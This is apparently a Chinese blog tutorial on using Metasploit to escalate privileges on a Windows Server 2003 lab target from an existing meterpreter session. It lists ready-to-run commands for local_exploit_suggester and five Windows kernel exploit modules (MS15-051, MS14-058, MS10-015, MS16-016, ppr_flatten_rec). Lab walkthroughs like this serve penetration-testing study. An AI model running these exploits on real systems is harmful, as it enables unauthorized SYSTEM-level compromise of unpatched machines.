msf利用- windows内核提权漏洞

 windows内核提权漏洞

 

环境:

Kali Linux(攻击机) 192.168.190.141

Windows2003SP2(靶机) 192.168.190.147

 

 

 

0x01寻找可利用的exp

实战中我们在拿到一个反弹shell(meterpreter)下一步会进行提权操作,而metaspolit的内置模块Local Exploit Suggester。这个模块可以帮助我们识别系统存在哪些漏洞可以被利用,并且为我们提供最合适的exp,通过这个exp我们可以进一步提权。

如下图,有一个普通用户权限的会话

 

 

 

 

在拿到meterpreter会话的前提下,我们可以利用这个模块进行收集

 

 

 

 

 

 

可以看到我这里有和目标机的一个session会话,id4,我们使用local_exploit_suggester模块

 


use post/multi/recon/local_exploit_suggester

 

set LHOST 192.168.190.141

 

set SESSION 1

 

Exploit

 


 

 

 

如下图所示,它自动的为我们匹配出了一些可能的用于易受攻击目标提权的漏洞利用的exp模块。

 

0x02 利用exp提权

根据metaspolit的内置模块Local Exploit Suggester模块列出的可利用模块,我们来进行提权,提权成功后会返回新的、提升权限成功后的session会话。

选取了几个常见的可利用的模块来进行提权演示。

 

Windows ClientCopyImage Win32k Exploit(ms15_051)
Windows内核模式驱动程序中的漏洞让攻击者可以进行提权。
这个模块利用了win32k.sys内核模式驱动程序中不正确的对象处理。

 

 

使用模块 查看设置的参数

设置参数 提权

use exploit/windows/local/ms15_051_client_copy_image

set lhost 192.168.190.141

set session 4

exploit

 

 

 

Windows TrackPopupMenu Win32k NULL Pointer Dereference(ms14_058)
该模块利用了win32k.sys中的NULL Pointer Dereference,这个漏洞可以通过使用TrackPopupMenu来触发。在特定情况下,可以在xxxSendMessage Timeout上滥用NULL Pointer Dereference来获取任意代码执行。
这个模块已经在Windows XP SP3,Windows Server 2003 SP2,Windows7 SP1,Windows Server2008 32位和Windows Server2008R2 SP164位上测试过。

use exploit/windows/local/ms14_058_track_popup_menu

set lhost 192.168.190.141

set session 4

exploit
 

 

 

 

通过KiTrap0D进行Windows系统提权(ms10_015)
这个模块会通过Kitrap0D这个exp来生成一个SYSTEM权限的新会话,如果当前会话已经是SYSTEM权限,那么这个脚本将不起作用。这个脚本依赖于kitrap0d.x86.dll这个文件,而且不支持64位的Windows操作系统。
该模块已经在存在漏洞的Windows Server 2003,Windows Server 2008,Windows7和XP上测试过,只限32位操作系统。

 

use exploit/windows/local/ms10_015_kitrap0d

set lhost 192.168.190.141

set session 4

exploit

 

 

 

mrxdav.sys WebDav本地提权MS16-016
这个exp利用的是mrxdav.sys中的漏洞,漏洞编号是MS16-016。该模块会在目标主机上生成一个进程,并通过在特权进程的环境下执行指定的payload来提权。
该模块在存在漏洞的Windows7 SP1 x86架构上测试过可行。

use exploit/windows/local/ms16_016_webdav

set lhost 192.168.190.141

set session 4

exploit

 

 

 

 

 

EPATHOBJ::pprFlattenRec本地提权
这个漏洞是由于EPATHOBJ::pprFlattenRec使用了未初始化的数据而产生的,该漏洞可以对内存产生破坏。
而我们的这个脚本就是利用这个漏洞来提权的。

这个模块已经在Windows XP SP3,Windows2003SP1和Windows7SP1上成功执行。

use exploit/windows/local/ppr_flatten_rec

set lhost 192.168.190.141

set session 4

exploit
 

 

因为实验是sp2就没有成功

 

 

posted @ 2019-03-27 18:53  卿先生  阅读(5577)  评论(0编辑  收藏  举报